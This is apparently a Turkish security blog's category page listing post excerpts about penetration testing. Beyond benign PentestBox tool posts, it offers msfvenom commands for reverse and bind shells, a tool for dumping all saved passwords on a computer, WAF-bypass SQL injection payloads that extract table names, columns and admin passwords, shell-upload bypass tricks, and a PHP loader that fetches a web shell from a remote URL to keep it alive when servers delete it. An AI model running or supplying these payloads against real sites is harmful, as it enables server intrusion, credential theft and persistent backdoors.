İçeriğe geç

Kategori: Güvenlik

msfvenom payload

PHP reverse shell msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f raw -o shell.php Java WAR reverse shell msfvenom -p java/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f war -o shell.war Linux bind shell msfvenom -p linux/x86/shell_bind_tcp LPORT=4443 -f c -b “\x00\x0a\x0d\x20” -e x86/shikata_ga_nai Linux FreeBSD reverse shell msfvenom -p bsd/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f elf -o…

Pentestbox

PENTESTBOX Windows ortamında pentest işlemleri yapanlar için bulunmaz nimet. Herhangi bir linux dağıtımını kurmaya gerek kalmadan hemen hemen tüm pentest toolarını ve modüllerini içeren bir pakettir. İndirmek için tıklayınız Pentestbox içerisinde bulunan toolların tamamı Burp Suite http://portswigger.net/burp/ Commix https://github.com/stasinopoulos/commix dotdotpwn https://github.com/PentestBox/dotdotpwn fimap https://tha-imax.de/git/root/fimap/tree/master Golismero https://github.com/golismero/golismero jSQL https://github.com/ron190/jsql-injection Nikto https://github.com/sullo/nikto PadBuster…

PentestBox Çalışma Hatası pentest box ‘sqlmap’ is not recognized as an internal or external command, operable program or batch file.

PentestBox üzerinde ilk kurulum sonrası bazı sistemlerde örneğin sqlmap uygulamasını çalıştırmayı denediniz aşağıdaki gibi bir hata alabilirsiniz. Bunun çözümü çok basit. pentest box ‘atom’ is not recognized as an internal or external command, operable program or batch file. pentest box ‘atom’ is not recognized as an internal or external command,…

Windows Ortamında Linux Araçlarının Kullanımı – PentestBox Tools

Sistemler üzerinde güvenlik açığı testi yapan hemen hemen bir çok kullanıcı Windows İşletim sisteminde sanal makineler üzerine Linux İşletim sistemi kurularak Linux’ un sunmuş olduğu imkanlardan faydalanır. Windows üzerinde Sanal Makine ile çalışırken bilgisayarımızda aşırı şekilde Bellek ve Cpu kullanımına neden olmaktadır. Bu gün sizlere Windows üzerinde Portable olarak çalışan ve Linux’ ta kullandığınız modüllerin hemen hemen hepsine sahip olan, kolay kullanımı…

Bilgisayarda Kayıtlı Tüm Şifreleri Bulun

Kayıtlı Tüm Şifreleri Bulun

Teknolojinin gelişmesiyle hayatımızı kolaylaştıran yazılımlardan tutun sosyal medya hesaplarına kadar bir çok platforma kişisel oturumlarımızı açmamız gerekiyor. Tabiki bunun için her birine ayrı bir şifre oluşturmamız güvenlik amacıyla önemli. Oluşturduğunuz şifreleri daha sonra hatırla işaretleyip geçiyorsunuz. Peki nasıl hatırlayacaksınız? İşte tam burada yazılımımız devreye giriyor ve kayıtlı tüm şifreleri karşımıza çıkarıyor.

    403 Forbidden DİOS WAF BYPASS

    403 Forbidden Access to this resource on the server is denied! DİOS WAF TABLO İSİMLERİNİ ÇEKMEK İÇİN  PHP Kod: index.php?id=35′ aNd 7154691=7154691 aNd ‘6199’=’6199-‘+/*!50000union*/+/*!50000select*/+(/*!50000select*/+concat+(@:=0,(/*!50000select*/+count(*) from+/*!50000information_schema.tables*/+WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND@:=concat+(@,0x3c​62723e,/*!50000table_name*/)),@))+,2,3,4– –  DİOS WAF KOLON İSİMLERİ ÇEKMEK İÇİN PHP Kod: index.php?id=35’ aNd 7154691=7154691 aNd ‘6199’=’6199-‘+/*!50000union*/+/*!50000select*/+(/*!50000select*/+concat+(@:=0,(/*!50000select*/+count(*) from+/*!50000information_schema.columns*/+WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND@:=concat+(@,0x3c​62723e,/*!50000column_name*/)),@))+,2,3,4– –    Toplu çekilemeyen error veren kolon içerikleri  PHP Kod: index.php?id=35’ aNd 7154691=7154691 aNd ‘6199’=’6199-‘+/*!50000union*/+/*!50000select*/+(admin_pass)+,2222,3333,4444+from+admin– –   

    Mysql Sql İnjection 404 error (kolon yansımıyorsa)

    Kolon numaralarını yansıtma sırasında 404 sayfasına atıyor yada 404 error hatası veriyorsa sayfa 4 den sonra hata veriyor demekki 4 üzerinden gideceğiz Kod: xxxx.php?id=35+/*!50000union*/+/*!50000select*/+1,2,3,4 yaptınız ve kolon numarasını yansıtmak için Kod: xxxx.php?id=-35+/*!50000union*/+/*!50000select*/+1,2,3,4 komutunu uyguladınız fakat 404 error hatası aldınız. Bunu bypass etmek için Kod: xxxx.php?id=35′ aNd 7154691=7154691 aNd ‘6199’=’6199 -‘+/*!50000union*/+/*!50000select*/+1111+,2222,3333,4444–…

    servera yüklenen shell otomatik siliniyorsa

    Kod: ‘; } if(file_exists($TMP)) { if(filesize($TMP) === 0) { unlink($TMP); M(); } else { include($TMP); } } else { M(); } ?> yukarıda http://wwww.shellyolu.com/shell.txt olarak belirtilen yere kendi shell kodlarınızı txt olarak yüklediğiniz url yi girin ve php dosyasını servera upload edin. bu sayede tmp dizinine txt olarak belirtmiş olduğunuz…

    Shell Upload Bypass

    Shell upload bypass Kod: http://site.com/shell.txt editleyip kendi shell yolunuzu txt olarak ekleyin düzenlenen php dosyasını servera upload edin. Aynı dosyanın bulunduğu url de shell.png.phtml.pHP olarak shelliniz yüklenmiş olacaktır.

    Sunucu otomatik shelli siliyorsa

    Burada Url yazan yere çalıştırmak istediğin shellin linkini gir. Bu shell tmp dizinine atılır ve oradan çağırılarak çalıştırılır. <?php //*thanx for idx $URL = ‘http://shelladresi.com’; $TMP = ‘/tmp/sess_’.md5($_SERVER[‘HTTP_HOST’]).’.php’; # dont change this !! function M() { $FGT = @file_get_contents($GLOBALS[‘URL’]); if(!$FGT) { echo `curl -k $(echo {$GLOBALS[‘URL’]} | base64 -d) >…